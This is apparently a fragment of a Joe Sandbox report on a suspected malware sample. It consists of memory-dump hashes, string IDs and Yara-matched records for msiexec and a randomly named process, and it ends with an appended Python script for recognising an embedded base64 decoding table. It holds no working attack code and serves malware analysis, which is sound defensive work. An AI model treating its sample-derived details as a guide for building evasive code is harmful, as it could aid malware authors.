• Instruction Fuzzy Hash: 7090023168154402D14171584844A06040957D0241FE6C013A0465514E8A958B56EA61
Memory Dump Source
• Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
• Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e62fe31e4e2e90023a5f81b4c91de407e50304add363c081077b8024aeccdc9d
• Instruction ID: d22ff094f0c551fa3001c9fe396afff05aa69e1844ae6c915e9fc7b945cc66ff
• Opcode Fuzzy Hash: e62fe31e4e2e90023a5f81b4c91de407e50304add363c081077b8024aeccdc9d
• Instruction Fuzzy Hash: 9F900221682581525545B1584844907440657E02417E6C013A1455910C89669A56D621
Memory Dump Source
• Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
• Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 561744015d372eaf4f2479df096bbc968b62c81d6394cb1d910f6ff9feffde6f
• Instruction ID: c0a91650baf10902f31e28b33bd06e900cd9e0121b6912142252065dc5794482
• Opcode Fuzzy Hash: 561744015d372eaf4f2479df096bbc968b62c81d6394cb1d910f6ff9feffde6f
• Instruction Fuzzy Hash: 2B90023164154413D11171584944B07040947D0241FE6C413A0465518D9A968B52E121
Memory Dump Source
• Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
• Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
• Instruction ID: 78c68fd38cfd37d327962fb9b91592bf8688f21296c7a28d0a84071769884ce5
• Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
• Instruction Fuzzy Hash:

Control-flow Graph (rendered graph for the function starting at block 22132890; legend: Executed / Not Executed; node and edge list not reproduced)
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
• Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: 9a9c7a6f845f78de0c56f0243806d742deb381c3c87c8013bb38910408b94719
• Instruction ID: a3c484f3a5ccfb3e0bae7163fd102deab7f911bb57d4d8df5d46a020d984534a
• Opcode Fuzzy Hash: 9a9c7a6f845f78de0c56f0243806d742deb381c3c87c8013bb38910408b94719
• Instruction Fuzzy Hash: 1151D8B6A40356AFCB15EF98C990D7EFBF9BB483007108269E4A8D7641D674DF50C7A0

Control-flow Graph (rendered graph for the function starting at block 22127630; legend: Executed / Not Executed; node and edge list not reproduced)
                                                                        Strings
                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 22164787
                                                                        • Execute=1, xrefs: 22164713
                                                                        • ExecuteOptions, xrefs: 221646A0
                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 221646FC
                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 22164655
                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 22164725
                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 22164742
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                        • API String ID: 0-484625025
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID: __aulldvrm
                                                                        • String ID: +$-$0$0
                                                                        • API String ID: 1302938615-699404926
                                                                        Strings
                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 221602E7
                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 221602BD
                                                                        • RTL: Re-Waiting, xrefs: 2216031E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                        • API String ID: 0-2474120054
                                                                        Strings
                                                                        • RTL: Resource at %p, xrefs: 22167B8E
                                                                        • RTL: Re-Waiting, xrefs: 22167BAC
                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 22167B7F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                        • API String ID: 0-871070163
                                                                        APIs
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2216728C
                                                                        Strings
                                                                        • RTL: Resource at %p, xrefs: 221672A3
                                                                        • RTL: Re-Waiting, xrefs: 221672C1
                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 22167294
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                        • API String ID: 885266447-605551621
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID: __aulldvrm
                                                                        • String ID: +$-
                                                                        • API String ID: 1302938615-2137968064
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $$@
                                                                        • API String ID: 0-1194432280
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "+$"3$0$3M$90$;$<$?ypG$A3$B$KK$\$^^$a?$b$gE$h$m)$n9$p>$pG$rj$s:$uS$|~$/$]$m
                                                                        • API String ID: 0-3736242705
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 6$O$S$\$s
                                                                        • API String ID: 0-3854637164
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: !$:=
                                                                        • API String ID: 0-750662103
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: WQ
                                                                        • API String ID: 0-2823796750
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Da
                                                                        • API String ID: 0-4017735984
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f286edb9c98afbac45e0d50cce7c2b7f53c149ef7fcf70f38db5057c69621668
                                                                        • Instruction ID: dff8ed1f9d79bceb97e60804bedc1b8b599f89e5c4490106d334cfbe1f703c5b
                                                                        • Opcode Fuzzy Hash: f286edb9c98afbac45e0d50cce7c2b7f53c149ef7fcf70f38db5057c69621668
                                                                        • Instruction Fuzzy Hash: C821F8B5A10308AFDB14DF58CC41EAF77B8EB89710F10850DF919AB240D770A915CBA5
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f22a7485913c754e88b3638ab54363130d6058ceb7c495f7f90824dfc6d7cc86
                                                                        • Instruction ID: 8f86b61843d5566899d3f2379023c6927050bb2516607bcef7c0b58c526cefe5
                                                                        • Opcode Fuzzy Hash: f22a7485913c754e88b3638ab54363130d6058ceb7c495f7f90824dfc6d7cc86
                                                                        • Instruction Fuzzy Hash: 471173B67803057BF720DA558C42FAB776D9B85B50F244019FB08AF2C0D6B5B81547B8
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 66cebfcf569bb08c01f2c10370893a6fa022b3067b7c6a65e054c6aa117c0f58
                                                                        • Instruction ID: 846ba78a93084571098383e8a9e6ba132204817d887318df96ec03718f5724a9
                                                                        • Opcode Fuzzy Hash: 66cebfcf569bb08c01f2c10370893a6fa022b3067b7c6a65e054c6aa117c0f58
                                                                        • Instruction Fuzzy Hash: 711151B59403146FD710EB68CC45FAF77ECEB85710F00854DF9195B281D7706915CBA9
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ba0a0f3c2f76b1e974ca5b04baa06825b65764f3ca799ec1bd60b06ded6b563f
                                                                        • Instruction ID: c4241056a70b8fa0aa303d8de511fd62250304116579a2d7a9a81c2581b75fa5
                                                                        • Opcode Fuzzy Hash: ba0a0f3c2f76b1e974ca5b04baa06825b65764f3ca799ec1bd60b06ded6b563f
                                                                        • Instruction Fuzzy Hash: 17115EB5A40315AFDB10EB68CC41FAB77ACEB85710F10854DFA196B280D7706916CBA9
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 11723e65f22c160cedb076eb235c544feb7ef4c0a24d84d0c297db9e7e4b7752
                                                                        • Instruction ID: 357d3e3301f396b250ab07a35ba81ce8d012e5fd9d7bb9d926f11fae4992e5d0
                                                                        • Opcode Fuzzy Hash: 11723e65f22c160cedb076eb235c544feb7ef4c0a24d84d0c297db9e7e4b7752
                                                                        • Instruction Fuzzy Hash: 0A01C0B2244608BBDB44DE99DC81EEB77EDAF8D710F018508BA0DE7240D630E8518BA4
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 17194ab061cabc529ad172f649c44655517cd80de3817c0ed064bf7eca8c3ade
                                                                        • Instruction ID: a122bfcc67d4969adf90fdaf11deae75bf812874e4b34ab84ebe28791afb9418
                                                                        • Opcode Fuzzy Hash: 17194ab061cabc529ad172f649c44655517cd80de3817c0ed064bf7eca8c3ade
                                                                        • Instruction Fuzzy Hash: 4BF024776102262BD7009A6DAC40F8AFF9CEB85230F290226F91CC7341DB71E82587E0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 52be92208fa957c59c635bc52c23d1b49fddf8a844ff1113085167805b8f9e1e
                                                                        • Instruction ID: 2a610a9ca9da9d51c511ee46c40f6a243e69201cc4ba6a51907f2f4df859bbe8
                                                                        • Opcode Fuzzy Hash: 52be92208fa957c59c635bc52c23d1b49fddf8a844ff1113085167805b8f9e1e
                                                                        • Instruction Fuzzy Hash: 54F01CB5610614BBDB10EF99DC81EDB77ACEF89710F008409B918AB241D670B9118BB4
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bda29215af404e63ea5841a5bf47159a533bd7fbcf7b6c61d1dc4e162ad7e555
                                                                        • Instruction ID: 5e45ba4a97acb2437564a17a6565f0582c7555373e0af8d2ba11736733debbdb
                                                                        • Opcode Fuzzy Hash: bda29215af404e63ea5841a5bf47159a533bd7fbcf7b6c61d1dc4e162ad7e555
                                                                        • Instruction Fuzzy Hash: 5BF08275C05208EBDB14CF64D841BDDBBB8EB04320F1043ADE8299B280E73497558B85
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ce236884e88abd1da2592d56879c599d7ce0433b3b18ba482d0d97a493f3fac7
                                                                        • Instruction ID: 5a4c3e2c60522a89e985e6b8e24f31f6d687b7f5bbf0fcd998988dfad5b2a7b3
                                                                        • Opcode Fuzzy Hash: ce236884e88abd1da2592d56879c599d7ce0433b3b18ba482d0d97a493f3fac7
                                                                        • Instruction Fuzzy Hash: 9DE06D766447147BDA10EE59DC41F9B77ECDF85710F004019F908A7241D770B8118BB8
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 460fe761b3f9d143aa16b5ebcebe51c1126fa60666e44c529ddd96764ff84967
                                                                        • Instruction ID: 071a02c614d92e5a663ca529d3fdbd0147c98ac2d1bc44a0f0ee54864aed8d50
                                                                        • Opcode Fuzzy Hash: 460fe761b3f9d143aa16b5ebcebe51c1126fa60666e44c529ddd96764ff84967
                                                                        • Instruction Fuzzy Hash: 62E04F76A4121437C320A6CDDD06F97B76C8BC2A60F194068FE089F340E565AD0182E8
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1d059be34a1983e242e36b498dc5b26b0b02f47ccae493070fbce90df4a1fadc
                                                                        • Instruction ID: 7d2410aa08c20d45d18a6da7d3671f4b52edb110f40cc144444dc89d2fd14351
                                                                        • Opcode Fuzzy Hash: 1d059be34a1983e242e36b498dc5b26b0b02f47ccae493070fbce90df4a1fadc
                                                                        • Instruction Fuzzy Hash: 8EE04F756407147BD620FA59DC00E9B7BACDFC5720F518419FA1C6B141C6747915C7E4
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6699b2647e3bf4cd0d9f671b7600112968d307164a2e66e84ed010ba73bb6902
                                                                        • Instruction ID: 48c514fe8c771df09f719354bdcb5a8a52cba7db8fe15cbed5380a50f89c6b0e
                                                                        • Opcode Fuzzy Hash: 6699b2647e3bf4cd0d9f671b7600112968d307164a2e66e84ed010ba73bb6902
                                                                        • Instruction Fuzzy Hash:
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                        • API String ID: 0-3248090998
                                                                        • Opcode ID: 7073e3ffd2b2dc40edfc1bfaad8272e51c01e4975561a4e11492259069ee833a
                                                                        • Instruction ID: e4f504cae3159b28e90931aa089696cbb21778f4e19d45b7f3e61060fa63e11f
                                                                        • Opcode Fuzzy Hash: 7073e3ffd2b2dc40edfc1bfaad8272e51c01e4975561a4e11492259069ee833a
                                                                        • Instruction Fuzzy Hash: E59100F08042998ECB118F55A5603DFBF71BB96204F1581E9C6AA7B243C3BE4E85DF90
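The String ID of the record above (the run of `@` filler, `>` and `?` isolated a few bytes apart, the ascending `456789:;<=` run, and the `!"#$` … `123@` dword fragments) has the shape of a 256-byte base64 decoding table in which every byte outside the alphabet maps to 0x40 (`@`). The following script is an added example, not part of the Joe Sandbox report and not code recovered from the sample: it builds such a table for the standard RFC 4648 alphabet (an assumption; the sample could use a custom alphabet), renders it the way a strings pass renders it, and checks a 256-byte candidate for the table's fixed landmarks so the same recognition can be applied to other dumps.

```python
import string

SENTINEL = 0x40  # '@': filler for non-alphabet bytes, as the dumped fragments suggest (assumption)


def build_decode_table(sentinel: int = SENTINEL) -> bytes:
    """256-entry base64 decode table: input byte -> 6-bit value, or the sentinel
    for every byte that is not in the alphabet (standard alphabet assumed)."""
    alphabet = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"
    table = bytearray([sentinel] * 256)
    for value, ch in enumerate(alphabet):
        table[ord(ch)] = value
    return bytes(table)


def render(table: bytes) -> str:
    """Show the table as a strings pass shows it: printable ASCII kept, the rest as '.'.
    'h'..'z' decode to 33..51, i.e. the printable run !"#$%&'()*+,-./0123."""
    return "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in table)


def dword_fragments(table: bytes) -> list:
    """Fully printable 4-byte slices: what a per-dword reference into the table
    looks like when each referenced dword is listed as its own string."""
    return [table[i:i + 4].decode("ascii")
            for i in range(0, len(table), 4)
            if all(0x20 <= b < 0x7F for b in table[i:i + 4])]


def looks_like_decode_table(blob: bytes) -> bool:
    """Recognise a 256-byte candidate: take its filler from byte 0 (0x00 is never in
    the alphabet) and require the alphabet landmarks everywhere else."""
    if len(blob) != 256:
        return False
    return blob == build_decode_table(blob[0])


def decode(table: bytes, data: bytes) -> bytes:
    """Decode with the table the way an inline decoder does: 6 bits per input byte,
    rejecting any byte that maps to the filler. Padding '=' is stripped first."""
    sentinel = table[0]
    out, acc, nbits = bytearray(), 0, 0
    for b in data.rstrip(b"="):
        v = table[b]
        if v == sentinel:
            raise ValueError(f"byte {b:#04x} is not in the base64 alphabet")
        acc = ((acc << 6) | v) & 0xFFFF  # at most 13 live bits, 16 is plenty
        nbits += 6
        if nbits >= 8:
            nbits -= 8
            out.append((acc >> nbits) & 0xFF)
    return bytes(out)


def is_valid(table: bytes, data: bytes) -> bool:
    """True when every input byte is in the alphabet the table encodes."""
    try:
        decode(table, data)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    t = build_decode_table()
    print(render(t))
    print(dword_fragments(t))
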